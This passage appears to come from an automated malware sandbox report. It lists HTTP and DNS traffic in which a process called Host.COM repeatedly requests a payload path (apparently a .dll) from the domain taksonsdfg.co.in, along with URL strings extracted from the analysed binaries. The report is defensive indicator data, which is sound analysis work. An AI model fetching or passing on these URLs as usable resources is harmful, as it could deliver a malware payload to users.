    Source: global trafficHTTP traffic detected: GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
    Source: global trafficDNS traffic detected: DNS query: taksonsdfg.co.in
    Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
    Source: kn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
    Source: Host.COM, Host.COM, 0000000B.00000003.1337851402.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1338107962.000000007F98F000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2589227345.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575784009.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575107446.000000000290A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
    Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
    Source: kn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
    Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
    Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
    Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
    Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
    Source: kn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
    Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
    Source: Host.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in
    Source: Host.COM, 0000000B.00000003.2398663811.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487958254.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000088F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/
    Source: Host.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/(
    Source: Host.COM, 0000000B.00000003.2357578707.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/;
    Source: Host.COM, 0000000B.00000003.1401491883.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/?
    Source: Host.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2055223478.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/K
    Source: Host.COM, 0000000B.00000002.2587832957.000000001D9EF000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2587832957.000000001DA5D000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2587832957.000000001DA2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/MIEJOHNSONERE/1
    Source: Host.COM, 0000000B.00000003.1839691740.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487958254.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311946192.0000000000891000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1747394449.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000088F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya
    Source: Host.COM, 0000000B.00000002.2573365210.00000000007DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya.dll
    Source: Host.COM, 0000000B.00000003.2440234813.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311946192.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaCompan
    Source: Host.COM, 0000000B.00000003.1578213645.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaF
    Source: Host.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaT
    Source: Host.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaU
    Source: Host.COM, 0000000B.00000003.1922948607.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1839691740.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffyagm
    Source: Host.COM, 0000000B.00000003.1747394449.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/c_
    Source: Host.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1705256794.000000000088F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098212044.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487958254.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357340565.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1839691740.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311734312.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2140994022.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1578286696.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1444396121.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1444396121.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1401491883.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
    Source: Host.COM, 0000000B.00000003.1401491883.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi77
    Source: Host.COM, 0000000B.00000003.2483388858.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiL
    Source: Host.COM, 0000000B.00000003.1839691740.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-R
    Source: Host.COM, 0000000B.00000003.2440234813.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1444396121.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2012862554.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2055223478.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487958254.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLas
    Source: Host.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2012862554.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1705256794.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1922948607.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1578286696.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311946192.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifya
    Source: Host.COM, 0000000B.00000002.2573365210.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifya;
    Source: Host.COM, 0000000B.00000003.1444396121.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyaK
    Source: Host.COM, 0000000B.00000003.1839691740.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyac_
    Source: Host.COM, 0000000B.00000003.2530460576.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyapQ
    Source: Host.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgigi-sys/suspendedpage.cgi
    Source: Host.COM, 0000000B.00000003.2269142479.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/h9
    Source: Host.COM, 0000000B.00000003.2357578707.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2012862554.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/k_
    Source: Host.COM, 0000000B.00000003.1487958254.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/p
    Source: Host.COM, 0000000B.00000003.1747394449.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/pQ
    Source: Host.COM, 0000000B.00000003.1839691740.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1578286696.0000000000862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/r
    Source: Host.COM, 0000000B.00000003.1444396121.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1705256794.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487958254.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/s_
    Source: Host.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1839691740.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311946192.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/ya
    Source: Host.COM, 0000000B.00000003.1922948607.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/yac_
    Source: Host.COM, 0000000B.00000003.2311946192.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/yak_
    Source: Host.COM, 0000000B.00000002.2573365210.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/yapQ
    Source: Host.COM, 0000000B.00000003.1922948607.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/yas_
    Source: Host.COM, 0000000B.00000003.2311946192.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1922948607.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.000000000088F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya
    Source: Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya6l
    Source: Host.COM, 0000000B.00000003.2311946192.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya9m
    Source: Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffyaa
    Source: Host.COM, 0000000B.00000003.2311946192.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.000000000088F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1922948607.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.000000000088F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.0000000000859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi
    Source: Host.COM, 0000000B.00000003.2311946192.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifya
    Source: Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifya9m
    Source: Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifyaa
    Source: Host.COM, 0000000B.00000003.2398663811.0000000000844000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1839562025.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311655958.000000000069B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1444396121.0000000000843000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487910197.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2012719233.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1658976901.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1705162095.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.0000000000844000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2484438938.0000000000844000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966265756.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269059652.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787397527.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311676740.0000000000683000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1444362085.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098183283.0000000000681000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573219588.0000000000680000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398437375.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966265756.00000000008C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.veeble.org/contact/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
